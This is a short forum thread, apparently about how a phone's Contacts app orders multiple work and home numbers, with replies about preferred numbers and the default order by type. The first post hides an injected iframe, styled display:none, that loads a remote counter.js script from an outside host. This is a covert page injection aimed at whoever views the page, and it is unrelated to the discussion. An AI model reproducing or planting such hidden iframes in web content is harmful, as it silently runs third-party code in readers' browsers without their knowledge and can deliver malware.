+ Reply to Thread

Phone Number Order in Contact Detail???

Does anyone have any idea how Contacts determines the display order of phone numbers when you view a contact? It doesn't seem to have any relationship to the way I entered them when I created the contact.

To be precise:

Create a contact. Enter a bunch of phone numbers. To make it interesting, enter three different work ("Phone (w)") numbers. Go back to the main Contacts screen and click on the contact name. You may find that the order is the same as you entered it, you may not.

Oddly, it doesn't seem to order the numbers numerically (although maybe I'm just not seeing the pattern?). It doesn't seem to care if you set one of the numbers as a "preferred number". And if you select Edit -> Edit contact you'll find that the order there is just as you entered it.

Anyone have any insights?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Finally knew what's going on. The phone uses the first phone # entry as the "preferred" # and shows up on the list view of the contacts.

Its kind of stupid. you have to change your preferred # to the first phone entry location in contacts edit and it will show up as the # in list view

I'm not sure I understand. You're saying that you can select one of several "Work Telephone" numbers and set that one to be the preferred one?

I see now that the default order is Work Telephone, Home Telephone, Work Cell Phone. But it's not clear how it rationalizes multiple phone numbers of a specific type.